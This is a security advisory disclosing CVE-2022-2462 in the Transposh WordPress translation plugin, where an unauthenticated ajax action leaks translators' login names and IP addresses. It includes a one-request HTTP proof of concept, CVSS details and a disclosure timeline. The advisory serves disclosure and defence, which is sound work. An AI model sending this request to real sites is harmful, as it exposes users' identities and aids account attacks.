RCE Security Advisory https://www.rcesecurity.com 1. ADVISORY INFORMATION ======================= Product: Transposh WordPress Translation Vendor URL: https://wordpress.org/plugins/transposh-translation-filter-for-wordpress/ Type: Exposure of Sensitive Information to an Unauthorized Actor [CWE-200] Date found: 2022-07-13 Date published: 2022-07-22 CVSSv3 Score: 5.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) CVE: CVE-2022-2462 2. CREDITS ========== This vulnerability was discovered and researched by Julien Ahrens from RCE Security. 3. VERSIONS AFFECTED ==================== Transposh WordPress Translation 1.0.8.1 and below 4. INTRODUCTION =============== Transposh translation filter for WordPress offers a unique approach to blog translation. It allows your blog to combine automatic translation with human translation aided by your users with an easy to use in-context interface. (from the vendor's homepage) 5. VULNERABILITY DETAILS ======================== Transposh offers an ajax action called "tp_history" which is intended to return data about who has translated a text given by the "token" parameter. However, the plugin also returns the user's login name as part of the "user_login" attribute. Successful exploits can allow an unauthenticated attacker to leak the WordPress username of translators. If an anonymous user submitted the translation, then the user's IP address is returned. 6. PROOF OF CONCEPT =================== The following Proof-of-Concept returns the information of the translated text "Calendly URL": POST /wp-admin/admin-ajax.php HTTP/1.1 Host: [host] Content-Length: 36 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 User-Agent: Mozilla/5.0 Connection: close action=tp_history&token=Calendly%20URL&lang=en 7. SOLUTION =========== None. Remove the plugin to prevent exploitation. 8. REPORT TIMELINE ================== 2022-07-13: Discovery of the vulnerability 2022-07-13: CVE requested from WPScan (CNA) 2022-07-18: No response from WPScan 2022-07-18: CVE requested from Wordfence (CNA) instead 2022-07-18: Sent note to vendor 2022-07-18: Wordfence assigns CVE-2022-2462 2022-07-20: Vendor states that there is no update planned so far 2022-07-22: Public disclosure 9. REFERENCES ============= https://github.com/MrTuxracer/advisories